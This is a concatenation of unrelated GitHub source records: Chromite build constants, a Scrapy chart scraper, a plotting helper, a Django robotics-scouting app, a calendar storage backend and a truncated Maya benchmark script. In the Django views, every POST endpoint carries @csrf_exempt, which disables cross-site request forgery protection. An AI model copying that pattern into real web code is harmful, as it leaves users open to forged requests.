'src/scripts')\nCHROMITE_BIN_SUBDIR = 'chromite/bin'\nCHROMITE_BIN_DIR = os.path.join(SOURCE_ROOT, CHROMITE_BIN_SUBDIR)\nPATH_TO_CBUILDBOT = os.path.join(CHROMITE_BIN_SUBDIR, 'cbuildbot')\nDEFAULT_CHROOT_DIR = 'chroot'\nSDK_TOOLCHAINS_OUTPUT = 'tmp/toolchain-pkgs'\n\n# Re-execution API constants.\n# Used by --resume and --bootstrap to decipher which options they\n# can pass to the target cbuildbot (since it may not have that\n# option).\n# Format is Major:Minor. Minor is used for tracking new options added\n# that aren't critical to the older version if it's not ran.\n# Major is used for tracking heavy API breakage- for example, no longer\n# supporting the --resume option.\nREEXEC_API_MAJOR = 0\nREEXEC_API_MINOR = 2\nREEXEC_API_VERSION = '%i.%i' % (REEXEC_API_MAJOR, REEXEC_API_MINOR)\n\nGOOGLE_EMAIL = '@google.com'\nCHROMIUM_EMAIL = '@chromium.org'\n\nCORP_DOMAIN = 'corp.google.com'\nGOLO_DOMAIN = 'golo.chromium.org'\n\nGOB_URL = 'https://%s.googlesource.com'\nGOB_REVIEW_URL = 'https://%s-review.googlesource.com'\n\nPUBLIC_GOB_HOST = 'chromium'\nPUBLIC_GOB_URL = GOB_URL % PUBLIC_GOB_HOST\nPUBLIC_GOB_REVIEW_URL = GOB_REVIEW_URL % PUBLIC_GOB_HOST\n\nINTERNAL_GOB_HOST = 'chrome-internal'\nINTERNAL_GOB_URL = GOB_URL % INTERNAL_GOB_HOST\nINTERNAL_GOB_REVIEW_URL = GOB_REVIEW_URL % INTERNAL_GOB_HOST\n\nGERRIT_PORT = '29418'\nGERRIT_INT_PORT = '29419'\n\nGERRIT_HOST = 'gerrit.chromium.org'\nGERRIT_INT_HOST = 'gerrit-int.chromium.org'\nGIT_HOST = 'git.chromium.org'\n\n# TODO(szager): Deprecate these variables in favor of (PUBLIC|INTERNAL)_GOB_*\n# once the migration to git-on-borg is complete. Leaving them intact now to\n# make the transition easier.\nif USE_GOB:\n GERRIT_SSH_URL = PUBLIC_GOB_URL\n GERRIT_INT_SSH_URL = INTERNAL_GOB_URL\n GIT_HTTP_URL = PUBLIC_GOB_URL\nelse:\n GERRIT_SSH_URL = 'ssh://%s:%s' % (GERRIT_HOST, GERRIT_PORT)\n GERRIT_INT_SSH_URL = 'ssh://%s:%s' % (GERRIT_INT_HOST, GERRIT_INT_PORT)\n GIT_HTTP_URL = 'http://%s/git' % GIT_HOST\n\nREPO_PROJECT = 'external/repo'\nREPO_URL = '%s/%s' % (GIT_HTTP_URL, REPO_PROJECT)\n\nCHROMITE_PROJECT = 'chromiumos/chromite'\nCHROMITE_URL = '%s/%s' % (GIT_HTTP_URL, CHROMITE_PROJECT)\nCHROMIUM_SRC_PROJECT = 'chromium/src'\n\nMANIFEST_PROJECT = 'chromiumos/manifest'\nMANIFEST_INT_PROJECT = 'chromeos/manifest-internal'\n\nMANIFEST_URL = '%s/%s' % (GIT_HTTP_URL, MANIFEST_PROJECT)\nMANIFEST_INT_URL = '%s/%s' % (GERRIT_INT_SSH_URL, MANIFEST_INT_PROJECT)\n\nDEFAULT_MANIFEST = 'default.xml'\nSHARED_CACHE_ENVVAR = 'CROS_CACHEDIR'\n\n# CrOS remotes specified in the manifests.\nEXTERNAL_REMOTE = 'cros'\nINTERNAL_REMOTE = 'cros-internal'\nCROS_REMOTES = {\n EXTERNAL_REMOTE : GERRIT_SSH_URL,\n INTERNAL_REMOTE : GERRIT_INT_SSH_URL\n}\n\n# TODO(sosa): Move to manifest-versions-external once its created\nMANIFEST_VERSIONS_SUFFIX = '/chromiumos/manifest-versions'\nMANIFEST_VERSIONS_INT_SUFFIX = '/chromeos/manifest-versions'\nMANIFEST_VERSIONS_GS_URL = 'gs://chromeos-manifest-versions'\n\nPATCH_BRANCH = 'patch_branch'\nSTABLE_EBUILD_BRANCH = 'stabilizing_branch'\nMERGE_BRANCH = 'merge_branch'\n\n# These branches are deleted at the beginning of every buildbot run.\nCREATED_BRANCHES = [\n PATCH_BRANCH,\n STABLE_EBUILD_BRANCH,\n MERGE_BRANCH\n]\n\n# Constants for uprevving Chrome\n\n# Portage category and package name for Chrome.\nCHROME_PN = 'chromeos-chrome'\nCHROME_CP = 'chromeos-base/%s' % CHROME_PN\n\n# Chrome URL where PGO data is stored.\nCHROME_PGO_URL = ('gs://chromeos-prebuilt/pgo-job/canonicals/'\n '%(package)s-%(arch)s-%(version_no_rev)s.pgo.tar.bz2')\n\n# Chrome use flags\nUSE_CHROME_INTERNAL = 'chrome_internal'\nUSE_CHROME_PDF = 'chrome_pdf'\nUSE_PGO_GENERATE = 'pgo_generate'\nUSE_PGO_USE = 'pgo_use'\n\n# PGO-specific constants.\nPGO_GENERATE_DISK_LAYOUT = '4gb-rootfs'\nPGO_USE_TIMEOUT = 180 * 60\n\n# Builds and validates _alpha ebuilds. These builds sync to the latest\n# revsion of the Chromium src tree and build with that checkout.\nCHROME_REV_TOT = 'tot'\n\n# Builds and validates chrome at a given revision through cbuildbot\n# --chrome_version\nCHROME_REV_SPEC = 'spec'\n\n# Builds and validates the latest Chromium release as defined by\n# ~/trunk/releases in the Chrome src tree. These ebuilds are suffixed with rc.\nCHROME_REV_LATEST = 'latest_release'\n\n# Builds and validates the latest Chromium release for a specific Chromium\n# branch that we want to watch. These ebuilds are suffixed with rc.\nCHROME_REV_STICKY = 'stable_release'\n\n# Builds and validates Chromium for a pre-populated directory.\n# Also uses _alpha, since portage doesn't have anything lower.\nCHROME_REV_LOCAL = 'local'\nVALID_CHROME_REVISIONS = [CHROME_REV_TOT, CHROME_REV_LATEST,\n CHROME_REV_STICKY, CHROME_REV_LOCAL, CHROME_REV_SPEC]\n\n\n# Build types supported.\n\n# TODO(sosa): Deprecate PFQ type.\n# Incremental builds that are built using binary packages when available.\n# These builds have less validation than other build types.\nINCREMENTAL_TYPE = 'binary'\n\n# These builds serve as PFQ builders. This is being deprecated.\nPFQ_TYPE = 'pfq'\n\n# TODO(sosa): Deprecate CQ type.\n# Commit Queue type that is similar to PFQ_TYPE but uses Commit Queue sync\n# logic.\nCOMMIT_QUEUE_TYPE = 'commit-queue'\n\n# Hybrid Commit and PFQ type. Ultimate protection.\nPALADIN_TYPE = 'paladin'\n\n# A builder that kicks off Pre-CQ builders that bless the purest CLs.\nPRE_CQ_LAUNCHER_TYPE = 'priest'\n\n# Chrome PFQ type. Incremental build type that builds and validates new\n# versions of Chrome. Only valid if set with CHROME_REV. See\n# VALID_CHROME_REVISIONS for more information.\nCHROME_PFQ_TYPE = 'chrome'\n\n# Builds from source and non-incremental. This builds fully wipe their\n# chroot before the start of every build and no not use a BINHOST.\nBUILD_FROM_SOURCE_TYPE = 'full'\n\n# Full but with versioned logic.\nCANARY_TYPE = 'canary'\n\n# Special build type for Chroot builders. These builds focus on building\n# toolchains and validate that they work.\nCHROOT_BUILDER_TYPE = 'chroot'\nCHROOT_BUILDER_BOARD = 'amd64-host'\n\n# Build that refreshes the online Portage package status spreadsheet.\nREFRESH_PACKAGES_TYPE = 'refresh_packages'\n\nVALID_BUILD_TYPES = (\n PALADIN_TYPE,\n INCREMENTAL_TYPE,\n BUILD_FROM_SOURCE_TYPE,\n CANARY_TYPE,\n CHROOT_BUILDER_TYPE,\n CHROOT_BUILDER_BOARD,\n CHROME_PFQ_TYPE,\n PFQ_TYPE,\n PRE_CQ_LAUNCHER_TYPE,\n REFRESH_PACKAGES_TYPE,\n)\n\n# The name of the builder used to launch the pre-CQ.\nPRE_CQ_BUILDER_NAME = 'pre-cq-group'\n\n\n# Define pool of machines for Hardware tests.\nHWTEST_DEFAULT_NUM = 6\nHWTEST_TRYBOT_NUM = 1\nHWTEST_MACH_POOL = 'bvt'\nHWTEST_PALADIN_POOL = 'cq'\nHWTEST_CHROME_PFQ_POOL = 'chromepfq'\nHWTEST_CHROME_PERF_POOL = 'chromeperf'\nHWTEST_TRYBOT_POOL = 'try-bot'\n# Currently supported hwtest boards.\nHWTEST_BOARD_WHITELIST = ['x86-mario', 'lumpy', 'daisy']\nHWTEST_AU_SUITE = 'au'\n\n# Defines VM Test types.\nSMOKE_SUITE_TEST_TYPE = 'smoke_suite'\nSIMPLE_AU_TEST_TYPE = 'pfq_suite'\nFULL_AU_TEST_TYPE = 'full_suite'\n\nVALID_AU_TEST_TYPES = [SMOKE_SUITE_TEST_TYPE, SIMPLE_AU_TEST_TYPE,\n FULL_AU_TEST_TYPE]\n\nVERSION_FILE = os.path.join('src/third_party/chromiumos-overlay',\n 'chromeos/config/chromeos_version.sh')\nSDK_VERSION_FILE = os.path.join('src/third_party/chromiumos-overlay',\n 'chromeos/binhost/host/sdk_version.conf')\nSDK_GS_BUCKET = 'chromiumos-sdk'\n\nPUBLIC = 'public'\nPRIVATE = 'private'\n\nBOTH_OVERLAYS = 'both'\nPUBLIC_OVERLAYS = PUBLIC\nPRIVATE_OVERLAYS = PRIVATE\nVALID_OVERLAYS = [BOTH_OVERLAYS, PUBLIC_OVERLAYS, PRIVATE_OVERLAYS, None]\n\n# Common default logging settings for use with the logging module.\nLOGGER_FMT = '%(asctime)s: %(levelname)s: %(message)s'\nLOGGER_DATE_FMT = '%H:%M:%S'\n\n# Used by remote patch serialization/deserialzation.\nINTERNAL_PATCH_TAG = 'i'\nEXTERNAL_PATCH_TAG = 'e'\nPATCH_TAGS = (INTERNAL_PATCH_TAG, EXTERNAL_PATCH_TAG)\n\n# Default gerrit query used to find changes for CQ.\nDEFAULT_CQ_READY_QUERY = ('status:open AND CodeReview=+2 AND Verified=+1 '\n 'AND CommitQueue=+1 '\n 'AND NOT ( CodeReview=-2 OR Verified=-1 )')\n\n# Default filter rules for verifying that Gerrit returned results that matched\n# our query. This used for working around Gerrit bugs.\nDEFAULT_CQ_READY_FIELDS = {'SUBM': '0', 'CRVW': '2', 'VRIF': '1', 'COMR': '1'}\n\n# Some files need permissions set for several distinct groups. A google storage\n# acl (xml) file will be necessary in those cases. Make available well known\n# locations and standardize.\nKNOWN_ACL_FILES = {'slave': os.path.expanduser('~/slave_archive_acl')}\n\n# Environment variables that should be exposed to all children processes\n# invoked via cros_build_lib.RunCommand.\nENV_PASSTHRU = ('CROS_SUDO_KEEP_ALIVE', SHARED_CACHE_ENVVAR)\n\n# List of variables to proxy into the chroot from the host, and to\n# have sudo export if existent. Anytime this list is modified, a new\n# chroot_version_hooks.d upgrade script that symlinks to 45_rewrite_sudoers.d\n# should be created.\nCHROOT_ENVIRONMENT_WHITELIST = (\n 'CHROMEOS_OFFICIAL',\n 'CHROMEOS_VERSION_AUSERVER',\n 'CHROMEOS_VERSION_DEVSERVER',\n 'CHROMEOS_VERSION_TRACK',\n 'GCC_GITHASH',\n 'GIT_AUTHOR_EMAIL',\n 'GIT_AUTHOR_NAME',\n 'GIT_COMMITTER_EMAIL',\n 'GIT_COMMITTER_NAME',\n 'GIT_PROXY_COMMAND',\n 'GIT_SSH',\n 'RSYNC_PROXY',\n 'SSH_AGENT_PID',\n 'SSH_AUTH_SOCK',\n 'USE',\n 'all_proxy',\n 'ftp_proxy',\n 'http_proxy',\n 'https_proxy',\n 'no_proxy',\n)\n\n# Paths for Chrome LKGM which are relative to the Chromium base url.\nCHROME_LKGM_FILE = 'CHROMEOS_LKGM'\nPATH_TO_CHROME_LKGM = 'chromeos/%s' % CHROME_LKGM_FILE\nSVN_CHROME_LKGM = 'trunk/src/%s' % PATH_TO_CHROME_LKGM\n\n# Cache constants.\nCOMMON_CACHE = 'common'\n\n# Artifact constants.\ndef _SlashToUnderscore(string):\n return string.replace('/', '_')\n\nDEFAULT_ARCHIVE_BUCKET = 'gs://chromeos-image-archive'\nCHROME_SYSROOT_TAR = 'sysroot_%s.tar.xz' % _SlashToUnderscore(CHROME_CP)\nCHROME_ENV_TAR = 'environment_%s.tar.xz' % _SlashToUnderscore(CHROME_CP)\nCHROME_ENV_FILE = 'environment'\nBASE_IMAGE_NAME = 'chromiumos_base_image'\nBASE_IMAGE_TAR = '%s.tar.xz' % BASE_IMAGE_NAME\nBASE_IMAGE_BIN = '%s.bin' % BASE_IMAGE_NAME\nIMAGE_SCRIPTS_NAME = 'image_scripts'\nIMAGE_SCRIPTS_TAR = '%s.tar.xz' % IMAGE_SCRIPTS_NAME\nMETADATA_JSON = 'metadata.json'\n\n# Global configuration constants.\nCHROMITE_CONFIG_DIR = os.path.expanduser('~/.chromite')\nCHROME_SDK_BASHRC = os.path.join(CHROMITE_CONFIG_DIR, 'chrome_sdk.bashrc')\nSYNC_RETRIES = 2\nSLEEP_TIMEOUT = 30\n\n# Lab status url.\nLAB_STATUS_URL = 'http://chromiumos-lab.appspot.com/current?format=json'\n\n# URLs to the various waterfalls.\nBUILD_DASHBOARD = 'http://build.chromium.org/p/chromiumos'\nBUILD_INT_DASHBOARD = 'https://uberchromegw.corp.google.com/i/chromeos'\nTRYBOT_DASHBOARD = 'https://uberchromegw.corp.google.com/i/chromiumos.tryserver'\n","repo_name":"espadrine/opera","sub_path":"chromium/src/third_party/chromite/buildbot/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"8385226201","text":"import scrapy\nimport datetime\nimport time as timer\nfrom scrapy.spiders import Spider\nfrom scrapy.selector import Selector\nfrom datetime import date, time\nfrom rymbot.items import RymbotItem\n\nclass rymSpider(Spider):\n\tname = \"rym\"\n\tallowed_domains = [\"https://rateyourmusic.com\"]\n\turls = []\n\n\tdef __init__(self, daysoutcmmd=0, *args, **kwargs):\n\t\tself.daysout = daysoutcmmd\n\t\tnow = datetime.datetime.now() + datetime.timedelta(int(self.daysout))\n\t\tself.readyear = now.year\n\t\tself.readday = now.strftime('%d')\n\t\tself.readmonth = now.strftime('%m')\n\t\n\tdef start_requests(self):\n\t\tyears = []\n\t\tyear = 1960\n\t\twhile (year <=2018):\n\t\t\tyears.append(year)\n\t\t\tyear = year + 1\n\t\tpagecounter = range(1,5)\n\t\turl_pattern = \"https://rateyourmusic.com/charts/top/album/{year}/{page}\"\n\n\t\tfor yearage in years:\n\t\t\tfor page in pagecounter:\n\t\t\t\tself.urls.append(url_pattern.format(year=yearage,page=page))\n\n\t\tfor url in self.urls:\n\t\t\tyield scrapy.Request(url=url, callback=self.parse)\n\t\t\t\n\tdef parse(self, response):\n\t\tsel = Selector(response)\n\t\tsites = sel.xpath('.//table[@class=\"mbgen\"]//tr')\n\t\titems = []\n\t\tfor site in sites:\n\t\t\titem = RymbotItem()\n\t\t\titem['year'] = (response.request.url[-6:])[:4] #year of album\n\t\t\titem['ranking'] = site.xpath('.//td[1]/span/text()').extract() #rank\n\t\t\titem['artist'] = site.xpath('.//td[3]/div[1]/div[2]/span/a/text()').extract() #artist\n\t\t\titem['album'] = site.xpath('.//td[3]/div[1]/div[2]/div[1]/a/text()').extract() #album\n\t\t\titem['genre'] = site.xpath('.//td[3]/div[1]/div[2]/div[2]/span/a[1]/text()').extract() #genre\n\t\t\titem['rating'] = site.xpath('.//td[3]/div[2]/a[1]/b[1]/text()').extract() #rym rating\n\t\t\titem['ratings'] = site.xpath('.//td[3]/div[2]/a[1]/b[2]/text()').extract() #num of ratings\n\t\t\titem['reviews'] = site.xpath('.//td[3]/div[2]/a[1]/b[3]/text()').extract() #num of reviews\n\t\t\titems.append(item)\n\t\treturn items","repo_name":"retropean/rym-bot","sub_path":"rymbot/spiders/rate_spider.py","file_name":"rate_spider.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74568818385","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nThis module contains functions for producing scatter plots with markers\nthat indicate which binary flags are set on each data point and accompanying\nlegends.\n\nThe output of the main scatterflags() function can be used as the input to\nthe flagbar() function to produce a colorbar.\n\nExample usage:\n import scatterflags as sf\n import numpy as np\n import matplotlib.pyplot as plt\n npts=50\n x = np.arange(npts)\n y = np.random.randn(npts)\n f,(ax0,ax1) = plt.subplots(2,1,figsize=(6,5),gridspec_kw={'height_ratios':[4,1]})\n kwargs = sf.scatterflags(x,y,np.round(np.random.randint(1,64,npts)),ax=ax0)\n ax0.scatter(x,y,c='0',s=1,zorder=10,marker='*')\n ax0.set_xlabel('x')\n ax0.set_ylabel('y')\n sf.flagbar(cax=ax1,flaglabels=['flag'+str(i) for i in range(6)],barlabel='flags',**kwargs)\n plt.tight_layout()\n plt.show()\n\n@author: bell@mps.mpg.de\n\"\"\"\n\nfrom __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport seaborn as sns\n\n\ndef scatterflags(x,y,flags,r=5.,dr=5.,ax=None,nflags=None,colors=None,cmap=None,\n minzorder=1,**kwargs):\n \"\"\"Plot scatter markers that indicate associated set flags.\n \n Args:\n x, y: input data\n flags: per-point flags (bitwise binary strings or base10 equiv ints)\n r: radius (pixels) of smallest marker (default: 5)\n dr: radius increase per flag (default: 5)\n ax: axis for scatterplot (optional)\n nflags: number of possible flags (can be inferred from flags)\n colors: colors to plot for each flag\n cmap: colormap to use for automaticly picking colors from (no jet!)\n minzorder: zorder of last flag (each earlier flag has one higher zorder)\n **kwargs: other keywords to pass to scatter (e.g. marker)\n \n Returns:\n kwargs for flagbar() function (produces colorbar legend) \n \"\"\"\n #Where is this plot going?\n if ax is None:\n ax = plt.gca()\n \n #Convert all integer strings to bitwise flags\n flags = [bin(num)[2:] for num in flags if isinstance(num, (int, long, np.integer))]\n \n #Set number of flags if not explicit\n if nflags is None:\n nflags = max([len(flag) for flag in flags])\n \n #Pad string flags to (at least) nflags\n flags = [flag.zfill(nflags) for flag in flags]\n \n #Each flag needs an associated color\n #These may have been explicitly included\n ncolors = nflags\n #If fewer colors were included, cycle through\n if colors is not None:\n colors = [colors[i % len(colors)] for i in range(nflags)]\n else: #colors not specified\n colors = sns.color_palette(cmap,nflags)\n \n #Define marker sizes\n ms = (r+dr*np.arange(nflags))**2.\n \n #Scatter plot for each flag\n #Smallest to largest (highest zorder to lowest = minzorder)\n for i in range(nflags):\n flagged = np.where([int(chars[-i-1]) for chars in flags])\n ax.scatter(x[flagged],y[flagged],s=ms[i],c=mpl.colors.to_hex(colors[i]),\n lw=0,zorder=minzorder+nflags-i,**kwargs)\n \n #Return dict of kwargs for formatting the colorbar\n return dict({'r':r,'dr':dr,'nflags':nflags,'colors':colors},**kwargs)\n\n\ndef flagbar(cax=None,nflags=None,r=5.,dr=5.,colors=None,cmap=None,\n flaglabels=None,barlabel=None,**kwargs):\n \"\"\"Plot colorbar with scatter marker shapes/sizes\n \n Args:\n cax: target axis for colorbar (short and wide ideally)\n nflags: number of different flags\n r: radius (pixels) of smallest marker (default: 5)\n dr: radius increase per flag (default: 5)\n colors: colors to plot for each flag\n cmap: colormap to use for automaticly picking colors from (no jet!)\n flaglabels: str labels associated with each flag\n barlabel: overall label for colorbar\n **kwargs: other keywords to pass to scatter (e.g. marker)\n \n Note: besides the cax, the returned dicts from scatterflags() will set\n the rest of these args appropriately. Call as `flagbar(cax,**kwargs)`\n where `kwargs = scatterflags(...)`\n \"\"\"\n #Determine number of flags to represent\n if nflags is None:\n if flaglabels is not None:\n nflags = len(flaglabels)\n elif colors is not None:\n nflags = len(colors)\n \n #Throw and error if number of flags not defined\n try:\n _ = int(nflags)\n except TypeError:\n raise ValueError(\"Must specify number of flags to flagbar, explicitly or implicitly.\")\n \n #Each flag needs an associated color\n #These may have been explicitly included\n ncolors = nflags\n #If fewer colors were included, cycle through\n if colors is not None:\n colors = [colors[i % len(colors)] for i in range(nflags)]\n else: #colors not specified\n colors = sns.color_palette(cmap,nflags)\n \n #Define marker sizes\n ms = (r+dr*np.arange(nflags))**2.\n \n #Length of flaglabels must be nflags\n if flaglabels is None:\n flaglabels = []\n nflaglabels = len(flaglabels)\n if nflaglabels < nflags:\n flaglabels += [\"\"]*(nflags-nflaglabels)\n else:\n flaglabels = flaglabels[:nflags]\n \n #Where to plot\n if cax is None: #Probably better to specify\n cax = plt.gca()\n \n #Plot colorbar\n colorbounds = np.linspace(0,1,nflags+1)\n colorcenters = (colorbounds[1:]+colorbounds[:-1])/2.\n cb = mpl.colorbar.ColorbarBase(cax,cmap=mpl.colors.ListedColormap(colors),\n ticks=colorcenters,spacing='proportional',\n orientation='horizontal')\n cb.ax.set_xticklabels(flaglabels,rotation=45) #label flags under colorbar\n if barlabel is not None: #label y axis side\n cax.set_ylabel(barlabel)\n cax.scatter(colorcenters,[.5]*nflags,edgecolor='0',s=ms,c='none',**kwargs)\n","repo_name":"keatonb/scatterflags","sub_path":"scatterflags.py","file_name":"scatterflags.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39566328838","text":"import csv\nimport os\nfrom sqlalchemy.exc import SQLAlchemyError as e\nfrom app import db\nfrom models import Strain\n\ndirec = os.path.dirname(os.path.abspath(__file__))\n\n\ndef create_strain_instance(row):\n print(row['terpenes'])\n strain = Strain(\n name=row['name'],\n terpenes=row['terpenes'],\n )\n print(f\"...adding Strain #{strain.name}, Strain ID: {strain.id}\")\n\n\ndef seed_db():\n try:\n print(\"Seeding database, this will take several minutes...\")\n with open('strains.csv') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n create_strain_instance(row)\n print(\"Database seeded!\")\n except e:\n print(\"Database error. Update aborted.\")\n db.session.rollback()\n\n\nseed_db()","repo_name":"areeves9/chemovar","sub_path":"seed_db.py","file_name":"seed_db.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27007641448","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.utils.text import slugify\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import Robot, Pit, Match\nfrom .forms import UploadFileForm, RobotForm, PitForm, MatchForm\n\n# Create your views here.\n# urlpatterns = [\n# path('add/match/', views.add_match),\n# path('add/pit/', views.add_pit),\n# path('add/robots/', views.add_robots),\n# path('list/', views.list),\n# path('robot//', views.robot),\n# ]\n#\n\n\n@csrf_exempt\ndef simple_scout(request):\n return render(request, 'scout/simple_scout.html', {})\n\n\n@csrf_exempt\ndef add_match(request):\n if request.method == 'POST':\n form = MatchForm(request.POST)\n if form.is_valid():\n form.save()\n form = MatchForm()\n else:\n form = MatchForm()\n return render(request, 'scout/form.html', {'form': form})\n\n\n@csrf_exempt\ndef add_pit(request):\n if request.method == 'POST':\n form = PitForm(request.POST)\n if form.is_valid():\n form.save()\n form = PitForm()\n else:\n form = PitForm()\n return render(request, 'scout/form.html', {'form': form})\n\n\n@csrf_exempt\ndef add_robots(request):\n if request.method == 'POST':\n form = UploadFileForm(request.POST, request.FILES)\n if form.is_valid():\n for chunk in request.FILES['file'].chunks():\n arr = str(chunk).split(',')\n for i in range(0, len(arr), 2):\n # lazy hack\n if arr[i][0] == 'b':\n arr[i] = arr[i][2:]\n robot = Robot(number=int(arr[i]), name=arr[i+1], slug=slugify(arr[i+1]))\n robot.save()\n print(robot)\n\n return JsonResponse({'status': 'ok'})\n else:\n form = UploadFileForm()\n return render(request, 'scout/form.html', {'form': form})\n\n\n@csrf_exempt\ndef add_external(request):\n if request.method == 'POST':\n scout = json.loads(request.POST['scout'])\n for data in scout:\n name = data['name']\n value = data['value']\n if name == 'scout_type':\n if value == 'match':\n Match.create_match(scout)\n if value == 'pit':\n Pit.create_pit(scout)\n return JsonResponse({'status': 'ok'})\n return JsonResponse({'status': 'error'})\n\n\ndef list_robots(request):\n robots = Robot.objects.filter(match_data__isnull=False).distinct()\n return render(request, 'scout/list.html', {'robots': robots})\n# return render(request, 'scouter/birdseyeview.html', {'my_surveys': my_surveys})\n\n\ndef list_saturday_robots(request):\n robots = Robot.objects.filter(match_data__saturday=True).distinct()\n return render(request, 'scout/list.html', {'robots': robots})\n\n\ndef tally_to_count(request):\n matches = Match.objects.all()\n for match in matches:\n if str(match.scale_cubes)[0] == '1':\n match.scale_cubes = len(str(match.scale_cubes))\n if str(match.vault_cubes)[0] == '1':\n match.vault_cubes = len(str(match.vault_cubes))\n if str(match.own_switch_cubes)[0] == '1':\n match.own_switch_cubes = len(str(match.own_switch_cubes))\n if str(match.other_switch_cubes)[0] == '1':\n match.other_switch_cubes = len(str(match.other_switch_cubes))\n match.save()\n return JsonResponse({\"Status\":\"Done!\"})\n\n\n","repo_name":"mknapper1/AwesomeScout","sub_path":"scout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36371337915","text":"# -*- coding: utf-8 -*-\n\nfrom cal9 import config\nfrom cal9 import ical\nfrom cal9.util import DEBUG\n\nfrom contextlib import contextmanager\n\nimport simplejson as json\nimport icalendar\nimport time\nimport os\n\nFOLDER = config.config.calendars.folder\n\nclass Collection(ical.Collection):\n @property\n def _path(self):\n \"\"\" Path on the computer \"\"\"\n\n # Remove first / and last /\n path = self.path.strip('/')\n\n return os.path.join(FOLDER, path.replace('/', os.sep))\n\n @property\n def _props_path(self):\n \"\"\" Properties path on the computer \"\"\"\n return '{0}.props'.format(self._path)\n\n def _makedirs(self):\n if not os.path.exists(os.path.dirname(self._path)):\n os.makedirs(os.path.dirname(self._path))\n\n @property\n def last_modified(self):\n # Create calendar if needed\n if not os.path.exists(self._path):\n self.save()\n\n modification_time = time.gmtime(os.path.getmtime(self._path))\n return time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\", modification_time)\n\n @property\n @contextmanager\n def props(self):\n properties = {}\n\n # Read properties\n\n if os.path.exists(self._props_path):\n with open(self._props_path, 'r') as f:\n properties.update(json.load(f))\n\n yield properties\n\n # Save properties\n\n self._makedirs()\n with open(self._props_path, 'w') as f:\n json.dump(properties, f)\n\n def get(self):\n ical = None\n\n # If path exists\n if os.path.exists(self._path):\n # Parse iCalendar object\n try:\n with open(self._path) as f:\n ical = icalendar.Calendar.from_ical(f.read())\n\n except IOError:\n ical = None\n\n if not ical:\n ical = icalendar.Calendar()\n\n return ical\n\n def write(self):\n self._makedirs()\n\n content = self.text\n\n with open(self._path, 'w') as f:\n f.write(content)\n\n def delete(self):\n os.remove(self._path)\n\n @classmethod\n def is_calendar(cls, path):\n abs_path = os.path.join(FOLDER, path.replace('/', os.sep))\n return os.path.isdir(abs_path)\n\n @classmethod\n def is_item(cls, path):\n abs_path = os.path.join(FOLDER, path.replace('/', os.sep))\n return os.path.isfile(abs_path)\n\nical.Collection = Collection\n","repo_name":"linkdd/9cal","sub_path":"cal9/backends/filesystem.py","file_name":"filesystem.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6963456149","text":"# -*- coding: utf-8 -*-\n\"\"\"\ncreate a sphere with random offset for performance test.\ntest in 2020 mayapy env.\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\n__author__ = \"timmyliang\"\n__email__ = \"820472580@qq.com\"\n__date__ = \"2022-07-20 13:09:04\"\n\n\nimport random\nimport time\nimport os\nfrom maya import cmds\nfrom maya import standalone\n\n\ndef log_time(func):\n def decorator(*args, **kwargs):\n curr = time.time()\n res = func(*args, **kwargs)\n print(\"[{0}] elapsed time: {1}\".format(func.__name__, time.time() - curr))\n return res\n return decorator\n\n\n@log_time\ndef openmaya_1(sx=50, sy=50):\n from maya import OpenMaya\n\n sphere = cmds.polySphere(sx=sx, sy=sy)[0]\n selection_list = OpenMaya.MSelectionList()\n OpenMaya.MGlobal.getActiveSelectionList(selection_list)\n sphere_dag_path = OpenMaya.MDagPath()\n selection_list.getDagPath(0, sphere_dag_path)\n itr = OpenMaya.MItMeshVertex(sphere_dag_path)\n\n while not itr.isDone():\n pt = itr.position()\n rand = (random.random() - 0.5) / 20\n itr.setPosition(pt + OpenMaya.MVector(rand, rand, rand))\n itr.next()\n\n return sphere\n\n\n@log_time\ndef openmaya_2(sx=50, sy=50):\n from maya.api import OpenMaya\n\n sphere = cmds.polySphere(sx=sx, sy=sy)[0]\n selection_list = OpenMaya.MGlobal.getActiveSelectionList()\n sphere_dag_path = selection_list.getDagPath(0)\n itr = OpenMaya.MItMeshVertex(sphere_dag_path)\n\n while not itr.isDone():\n pt = itr.position()\n rand = (random.random() - 0.5) / 20\n itr.setPosition(pt + OpenMaya.MVector(rand, rand, rand))\n itr.next()\n return sphere\n\n\n@log_time\ndef maya_cmds(sx=50, sy=50):\n from maya import cmds\n\n sphere = cmds.polySphere(sx=sx, sy=sy)[0]\n for vtx in cmds.ls(\"{0}.vtx[*]\".format(sphere), fl=True):\n pt = cmds.pointPosition(vtx)\n rand = (random.random() - 0.5) / 20\n cmds.xform(vtx, t=(pt[0] + rand, pt[1] + rand, pt[2] + rand))\n return sphere\n\n\n@log_time\ndef run_cpp(sx=50, sy=50):\n return cmds.createNoiseSphere(sx=sx, sy=sy)\n\n\ndef load_plugin():\n if cmds.pluginInfo(\"noiseSphere\", q=1, l=1):\n cmds.unloadPlugin(\"noiseSphere\")\n\n repo = (lambda f: f(f, os.path.dirname(__file__)))(\n lambda f, p: p\n if [d for d in os.listdir(p) if d == \".git\"]\n else f(f, os.path.dirname(p))\n if os.path.dirname(p) != p\n else None\n )\n folder = \"maya{0}\".format(cmds.about(q=1, v=1))\n mll_path = os.path.join(repo, \"release\", folder, \"noiseSphere.mll\")\n 